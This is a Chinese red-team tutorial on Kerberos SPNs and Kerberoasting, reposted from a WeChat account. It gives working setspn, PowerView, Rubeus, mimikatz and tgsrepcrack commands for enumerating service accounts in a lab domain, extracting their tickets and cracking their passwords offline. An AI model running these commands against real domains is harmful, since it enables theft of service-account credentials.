SPN的相关利用

admin 2022年9月28日12:04:49安全闲碎评论8 views1725字阅读5分45秒阅读模式

首发先知社区:https://xz.aliyun.com/t/10106

0x01 什么是SPN

服务主体名称(SPN)是服务实例,可以理解为一个服务,比如mssql,http等等的唯一标识符。如果在整个林或域中的计算机上安装多个服务实例,则每个实例都必须具有自己的 SPN,Kerberos 身份验证使用 SPN 将服务实例与服务登录帐户相关联。

0x02 注册SPN

2.1 机器账户

只有机器账户或者域管账户才有权限注册SPN。

setspn -S mssqlserver/hostname.xx.com:1433 accountname
SPN的相关利用

2.2 域用户

setspn -S SqlServer/mssql.redteam.local:1434/SqlServer hack
SPN的相关利用

2.3 查看已注册的SPN

查看域内所有SPN

setspn -q */*
SPN的相关利用

指定查看域注册的SPN

setspn -T redteam.local -q */*

删除指定SPN

setspn -D mssql/mssql.redteam.local:1433/mssql mssql

指定用户名/主机名查看SPN

setspn -L username/hostname

0x03 SPN扫描

在域内渗透我们就不需要通过扫描来查看到底那台机器开了那些服务,可以通过SPN来获取想要的信息。相对于隐蔽性强。

3.1 PowerView

powershell -exec bypass
Import-module .powerview.ps1
Get-NetUser -SPN
SPN的相关利用

3.2 PowerShell-AD-Recon

Import-Module .Discover-PSInterestingServices.ps1
Discover-PSInterestingServices      #扫描域内的所有SPN信息
SPN的相关利用

3.3 GetUserSPNs

Import-Module .GetUserSPNs.ps1
SPN的相关利用

3.4 流量分析

通过wireshark可以看到

SPN的相关利用

就是通过LDAP协议向域控服务器上的LADP查询了SPN服务。

可以通过ADSI编辑器查看用户属性的servicePrincipalName值

SPN的相关利用

0x04 Kerberoasting

kerberos通信过程:

SPN的相关利用

在TGS-REQ中会发出ST服务票据获取servicePrincipalName(SPN),该SPN是用户或者机器用户注册的。TGS-REP中TGS会返回给user一个ST,而ST是由user请求的server的密码进行加密的,我们可以从TGS-REP中提取加密的服务票证来进行离线解密。

在本地安全策略中将kerberos允许的加密类型改为RC4加密:

SPN的相关利用

在运行更新策略:

gpupdate

4.1 SPN扫描

Import-Module .GetUserSPNs.ps1
SPN的相关利用

4.2 请求票据

4.2.1 powershell请求

Add-Type -AssemblyName System.IdentityModel  New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SqlServer/mssql.redteam.local:1434/SqlServer"
SPN的相关利用

4.2.2 Rubeus.exe

Rubeus.exe kerberoast
SPN的相关利用

Rubeus原理为现在LDAP查询SPN,再发送TGS包,再打印出hash,可以使用hashcat等进行爆破。

4.3 导出票据

mimikatz导出票据

kerberos::list /export
SPN的相关利用

4.4 离线破解

使用tgsrepcrack.py

python2 tgsrepcrack.py pass.txt xx.kirbi
SPN的相关利用
   加下方wx,拉你一起进群学习
SPN的相关利用

往期推荐

关于利用rundll32执行程序的分析

什么?Windows defender 竟如此脆弱?

最新办法绕过360核晶添加计划任务

一款域信息收集神器

最新绕过360添加用户 | 红队蓝军祝您双节快乐

域内批量获取敏感文件

域内批量解析chrome浏览器

深入注册表监控

net反射

SPN的相关利用

原文始发于微信公众号(红队蓝军):SPN的相关利用

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月28日12:04:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  SPN的相关利用 http://cn-sec.com/archives/1320905.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: